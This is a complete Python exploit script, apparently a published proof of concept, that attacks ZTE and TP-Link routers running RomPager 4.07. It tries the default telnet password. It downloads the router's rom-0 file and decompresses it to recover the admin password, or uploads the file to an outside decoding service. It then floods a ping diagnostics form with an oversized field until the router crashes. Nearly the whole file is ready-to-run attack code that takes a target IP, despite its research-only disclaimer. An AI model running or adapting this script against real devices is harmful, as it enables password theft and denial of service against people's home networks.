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#!/usr/bin/env python # -*- coding: utf-8 -*-   # Exploit Title: ZTE and TP-Link RomPager DoS Exploit # Date: 10-05-2014 # Server Version: RomPager/4.07 UPnP/1.0 # Tested Routers:   ZTE ZXV10 W300 #                   TP-Link TD-W8901G #                   TP-Link TD-W8101G #                   TP-Link TD-8840G # Firmware: FwVer: HwVer:T14.F7_5.0 # Tested on: Kali Linux x86 # # Notes:    Please note this exploit may contain errors, and #           is provided "as it is". There is no guarantee #           that it will work on your target router(s), as #           the code may have to be adapted. #           This is to avoid script kiddie abuse as well. # # Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. #             Author takes no responsibility for any kind of damage you cause. # # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith) # # Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/ # Video: https://www.youtube.com/watch?v=1fSECo2ewoo # Dedicate to Nick Knight and Hood3dRob1n #  # ./dos.py -i   import os import re import sys import time import urllib import base64 import httplib import urllib2 import requests import optparse import telnetlib import subprocess import collections import unicodedata    class BitReader:           def __init__(self, bytes):         self._bits = collections.deque()                   for byte in bytes:             byte = ord(byte)             for n in xrange(8):                 self._bits.append(bool((byte >> (7-n)) & 1))                   def getBit(self):         return self._bits.popleft()               def getBits(self, num):         res = 0         for i in xrange(num):             res += self.getBit() << num-1-i         return res               def getByte(self):         return self.getBits(8)               def __len__(self):         return len(self._bits)           class RingList:           def __init__(self, length):         self.__data__ = collections.deque()         self.__full__ = False         self.__max__ = length        def append(self, x):         if self.__full__:             self.__data__.popleft()         self.__data__.append(x)         if self.size() == self.__max__:             self.__full__ = True        def get(self):         return self.__data__        def size(self):         return len(self.__data__)        def maxsize(self):         return self.__max__               def __getitem__(self, n):         if n >= self.size():             return None         return self.__data__[n]   def filter_non_printable(str):   return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])     def banner():     return '''   \t\t    _/_/_/                _/_/_/   \t\t   _/    _/    _/_/    _/          \t\t  _/    _/  _/    _/    _/_/       \t\t _/    _/  _/    _/        _/      \t\t_/_/_/      _/_/    _/_/_/                                       '''                          def dos(host, password):     while (1):         url = 'http://' +host+ '/Forms/tools_test_1'         parameters = {         'Test_PVC'          :   'PVC0',         'PingIPAddr'        :   '\101'*2000,         'pingflag'          :   '1',         'trace_open_flag'   :   '0',         'InfoDisplay'       :   '+-+Info+-%0D%0A'         }                   params = urllib.urlencode(parameters)                   req = urllib2.Request(url, params)         base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')         req.add_header("Authorization", "Basic %s" %base64string)         req.add_header("Content-type", "application/x-www-form-urlencoded")         req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")         try:                 print '[~] Sending Payload'                 response = urllib2.urlopen(req, timeout=1)                 sys.exit(0)                       except:             flag = checkHost(host)             if flag == 0:                 print '[+] The host is still up and running'             else:                 print '[~] Success! The host is down'                 sys.exit(0)                 break   def checkHost(host):     if sys.platform == 'win32':         c = "ping -n 2 " + host     else:         c = "ping -c 2 " + host       try:         x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)         time.sleep(1)         return x               except:         pass   def checkServer(host):     connexion = httplib.HTTPConnection(host)     connexion.request("GET", "/status.html")     response = connexion.getresponse()     server = response.getheader("server")     connexion.close()     time.sleep(2)     if server == 'RomPager/4.07 UPnP/1.0':         return 0     else:         return 1   def checkPassword(host):     print '[+] Checking for default password'     defaultpass = 'admin'     tn = telnetlib.Telnet(host, 23, 4)     tn.read_until("Password: ")     tn.write(defaultpass + '\n')     time.sleep(2)     banner = tn.read_eager()     banner = regex(len(defaultpass)*r'.'+'\w+' , banner)     tn.write("exit\n")     tn.close()     time.sleep(4)     if banner == 'Copyright':         print '[+] Default password is being used'         dos(host, defaultpass)     else:         print '[!] Default Password is not being used'     while True:         msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()         try:             if msg[0] == 'y':                 password = decodePasswordLocal(host)                 print '[*] Router password is: ' +password                 dos(host, password)                 break                               if msg[0] == 'n':                 password = decodePasswordRemote(host)                 print '[*] Router password is: ' +password                 dos(host, password)                 break             else:                 print '[!] Enter a valid choice'         except Exception, e:                 print e                 continue             def decodePasswordRemote(host):     fname = 'rom-0'     if os.path.isfile(fname) == True:         os.remove(fname)     urllib.urlretrieve ("http://"+host+"/rom-0", fname)     # If this URL goes down you might have to find one and change this function.     # You can also use the local decoder. It might have few errors in getting output.     url = ''                # Target URL     files = {'uploadedfile': open('rom-0', 'rb') }                 # The rom-0 file we wanna upload     data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'}    # Additional Parameters we need to include     headers = { 'User-agent' : 'Python Demo Agent v1' }            # Any additional Headers you want to send or include       res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )     res1 =res.content     p = re.search('rows=10>(.*)', res1)     if p:         passwd = found = p.group(1)     else:         password = 'NotFound'     return passwd   def decodePasswordLocal(host):     # Sometimes this might output a wrong password while finding the exact string.     # print the result as mentioned below and manually find out     fname = 'rom-0'     if os.path.isfile(fname) == True:         os.remove(fname)     urllib.urlretrieve ("http://"+host+"/rom-0", fname)     fpos=8568     fend=8788     fhandle=file('rom-0')     fhandle.seek(fpos)     chunk="*"     amount=221     while fpos < fend:         if fend-fpos < amount:             amount = amount             data = fhandle.read(amount)             fpos += len(data)                   reader = BitReader(data)     result = ''              window = RingList(2048)               while True:         bit = reader.getBit()         if not bit:             char = reader.getByte()             result += chr(char)             window.append(char)         else:             bit = reader.getBit()             if bit:                 offset = reader.getBits(7)                 if offset == 0:                     break             else:                 offset = reader.getBits(11)                           lenField = reader.getBits(2)             if lenField < 3:                 lenght = lenField + 2             else:                 lenField <<= 2                 lenField += reader.getBits(2)                 if lenField < 15:                     lenght = (lenField & 0x0f) + 5                 else:                     lenCounter = 0                     lenField = reader.getBits(4)                     while lenField == 15:                         lenField = reader.getBits(4)                         lenCounter += 1                     lenght = 15*lenCounter + 8 + lenField                           for i in xrange(lenght):                 char = window[-offset]                 result += chr(char)                 window.append(char)       result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')     # In case the password you see is wrong while filtering, manually print it from here and findout.     #print result     if 'TP-LINK' in result:         result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';         result = result.replace("TP-LINK", "")         result = result[1:]       if 'ZTE' in result:         result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';         result = result.replace("ZTE", "")         result = result[1:]       if 'tc160' in result:         result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';         result = result.replace("tc160", "")         result = result[1:]     return result       def regex(path, text):     match = re.search(path, text)     if match:         return match.group()     else:         return None   def main():     if sys.platform == 'win32':         os.system('cls')     else:         os.system('clear')     try:         print banner()         print ''' |=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n [*] Author: Osanda Malith Jayathissa [*] Follow @OsandaMalith [!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only. [!] Author takes no responsibility for any kind of damage you cause.       '''         parser = optparse.OptionParser("usage: %prog -i <IP Address> ")         parser.add_option('-i', dest='host',                             type='string',                              help='Specify the IP to attack')         (options, args) = parser.parse_args()                   if options.host is None:             parser.print_help()             exit(-1)           host = options.host         x = checkHost(host)           if x == 0:             print '[+] The host is up and running'             server = checkServer(host)             if server == 0:                 checkPassword(host)             else:                 print ('[!] Sorry the router is not running RomPager')         else:             print '[!] The host is not up and running'             sys.exit(0)       except KeyboardInterrupt:         print '[!] Ctrl + C detected\n[!] Exiting'         sys.exit(0)     except EOFError:         print '[!] Ctrl + D detected\n[!] Exiting'         sys.exit(0)   if __name__ == "__main__":     main()  #EOF

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